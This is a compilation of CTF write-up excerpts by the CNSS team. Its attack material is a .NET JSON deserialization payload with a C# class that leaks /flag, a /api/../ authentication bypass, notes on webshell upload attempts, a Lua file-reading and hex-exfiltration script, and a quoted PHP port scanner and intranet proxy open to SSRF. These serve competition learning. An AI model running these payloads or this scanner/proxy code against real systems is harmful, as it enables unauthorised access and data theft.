NepCTF2022 Writeups - CNSS


Web

QR Code Maker

JSON deserialization vulnerability: the payload deserializes to the Debug class, which loads the uploaded DLL.

{"$type":"qrcode_maker.Debug, qrcode_maker","ClassName":"./uploads/2111c416-2d20-4a7c-9393-12b0889a17f4","MethodName":"ClassLibrary5.Class1"}
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace ClassLibrary5
{
    public class Class1
    {
        // Runs as soon as the loaded assembly instantiates the class:
        // read the flag and surface it through the exception message.
        public Class1()
        {
            String text = File.ReadAllText("/flag");
            throw new Exception(text);
        }
    }
}

WMCTF2022 Writeups - CNSS

WMCTF2022 Writeup - CNSS

Web

easyjeecg

/api/../ bypasses the authentication check.

Any GetShell approach will do.

Uploading through the CgUploadController route into the upload directory: requesting the shell returns an nginx 403.

Uploading through the iconController route into the plug-in/accordion/images directory: 404.

The upload directory blocks access to the .jsp extension.

There is also an unauthenticated endpoint, /webpage/system/druid/websession.json,

which exposes everyone's sessions; it probably isn't needed for this challenge.


Mimic 2021 Preliminary Writeup - CNSS

4th Qiangwang Cup Mimic Defense Challenge Online Preliminary Writeup by CNSS

Web

zerocalc

A modified notevil 1.3.3.

The challenge hints that arbitrary file reads are possible:

readFile('./src/index.js')


XCTF 2020 Round 3 WriteUp - CNSS

RealWorld

luaplayground01

Read the flag_app file with io, then exfiltrate it hex-encoded.

-- Open the target binary and read it in whole as raw bytes
file = io.open("/bin/flag_app", "rb")
io.input(file)
content = io.read("*a")

-- Encode a binary string as uppercase hex, two characters per byte
function hex2str(hex)
    local ret = ""
    for index = 1, hex:len() do
        ret = ret .. string.format("%02X", hex:byte(index))
    end
    return ret
end

-- Print the hex in 100-character chunks so it survives the output channel
hex = hex2str(content)
for index = 1, 300 do
    print(hex:sub(100 * (index - 1), 100 * index - 1))
end

XCTF 2020 Round 2 WriteUp - CNSS

Web

BABYPHP

Search GitHub for the related source code:

<?php

set_time_limit(0); // no execution time limit
ob_implicit_flush(True);
ob_end_flush();
$url = isset($_REQUEST['url']) ? $_REQUEST['url'] : null;

/* Port scanner */
function check_port($ip, $port, $timeout = 0.1) {
    $conn = @fsockopen($ip, $port, $errno, $errstr, $timeout);
    if ($conn) {
        fclose($conn);
        return true;
    }
    return false;
}

function scanip($ip, $timeout, $portarr) {
    foreach ($portarr as $port) {
        // The assignment inside the argument list forces the timeout to 0.1s,
        // so the user-supplied $timeout is never actually used.
        if (check_port($ip, $port, $timeout = 0.1) == True) {
            echo 'Port: ' . $port . ' is open<br/>';
            @ob_flush();
            @flush();
        }
    }
}

echo '<html>
<form action="" method="post">
<input type="text" name="startip" value="Start IP" />
<input type="text" name="endip" value="End IP" />
<input type="text" name="port" value="80,8080,8888,1433,3306" />
Timeout<input type="text" name="timeout" value="10" /><br/>
<button type="submit" name="submit">Scan</button>
</form>
</html>
';

if (isset($_POST['startip']) && isset($_POST['endip']) && isset($_POST['port']) && isset($_POST['timeout'])) {

    $startip = $_POST['startip'];
    $endip = $_POST['endip'];
    $timeout = $_POST['timeout'];
    $port = $_POST['port'];
    $portarr = explode(',', $port);
    $siparr = explode('.', $startip);
    $eiparr = explode('.', $endip);
    $ciparr = $siparr;
    // Only the last two octets may differ: refuse anything wider than that
    if (count($ciparr) != 4 || $siparr[0] != $eiparr[0] || $siparr[1] != $eiparr[1]) {
        exit('IP error: Wrong IP address or Trying to scan class A address');
    }
    if ($startip == $endip) {
        echo 'Scanning IP ' . $startip . '<br/>';
        @ob_flush();
        @flush();
        scanip($startip, $timeout, $portarr);
        @ob_flush();
        @flush();
        exit();
    }

    if ($eiparr[3] != 255) {
        $eiparr[3] += 1;
    }
    // Walk the range one address at a time, carrying into the higher octets
    while ($ciparr != $eiparr) {
        $ip = $ciparr[0] . '.' . $ciparr[1] . '.' . $ciparr[2] . '.' . $ciparr[3];
        echo '<br/>Scanning IP ' . $ip . '<br/>';
        @ob_flush();
        @flush();
        scanip($ip, $timeout, $portarr);
        $ciparr[3] += 1;

        if ($ciparr[3] > 255) {
            $ciparr[2] += 1;
            $ciparr[3] = 0;
        }
        if ($ciparr[2] > 255) {
            $ciparr[1] += 1;
            $ciparr[2] = 0;
        }
    }
}

/* Intranet proxy */

function getHtmlContext($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, TRUE);   // include the response headers
    curl_setopt($ch, CURLOPT_NOBODY, FALSE);  // include the response body
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($ch, CURLOPT_TIMEOUT, 120);
    $result = curl_exec($ch);
    global $header;
    $body = NULL;
    if ($result) {
        $headerSize = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
        $header = explode("\r\n", substr($result, 0, $headerSize));
        $body = substr($result, $headerSize);
    }
    if (curl_getinfo($ch, CURLINFO_HTTP_CODE) == '200') {
        return $body;
    }
    if (curl_getinfo($ch, CURLINFO_HTTP_CODE) == '302') {
        // Redirects are followed by hand. Note that strpos(...) == false is also
        // true when 'http://' sits at offset 0, so an absolute Location still gets
        // the original host prepended; this is how the posted source behaves.
        $location = getHeader("Location");
        if (strpos(getHeader("Location"), 'http://') == false) {
            $location = getHost($url) . $location;
        }
        return getHtmlContext($location);
    }
    return NULL;
}

// getHeader() is called above but was missing from the posted source. This
// minimal version is reconstructed here (not from the original): it looks the
// named header up in the global $header array filled by getHtmlContext().
function getHeader($name) {
    global $header;
    if (!is_array($header)) {
        return '';
    }
    foreach ($header as $line) {
        if (stripos($line, $name . ':') === 0) {
            return trim(substr($line, strlen($name) + 1));
        }
    }
    return '';
}

function getHost($url) {
    // $matches[0] keeps the scheme when one is present, e.g. "http://host"
    preg_match("/^(http:\/\/)?([^\/]+)/i", $url, $matches);
    return $matches[0];
}

function getCss($host, $html) {
    // Inline every referenced stylesheet; same strpos() == false quirk as above,
    // and file_get_contents() fetches whatever URL results
    preg_match_all("/<link[\s\S]*?href=['\"](.*?[.]css.*?)[\"'][\s\S]*?>/i", $html, $matches);
    foreach ($matches[1] as $v) {
        $cssurl = $v;
        if (strpos($v, 'http://') == false) {
            $cssurl = $host . "/" . $v;
        }
        $csshtml = "<style>" . file_get_contents($cssurl) . "</style>";
        $html .= $csshtml;
    }
    return $html;
}

if ($url != null) {
    $host = getHost($url);
    echo getCss($host, getHtmlContext($url));
}
?>

Anxun Cup WriteUp - CNSS

Reverse

debugging

The input is encrypted with blowfish-compat (key size 64, block size 64, ECB mode, key = b'who_am_i').

It then enters a VM, which simply hexlifies the result, reverses it, adds some offset constants and compares against the target.


X-NUCA'2020 WriteUp - CNSS

Reverse

hellowasm

From debugging and some guesswork: the input goes through base64, but is also XORed with key = [0xa,0xb,0xc,0xd].

It then enters a virtual machine. Debugging shows it uses only a handful of instructions, and among the arithmetic ones XOR is by far the most common, so setting a breakpoint on the XOR and analyzing it reveals the XOR logic; after that, simply XOR back following the same rules.
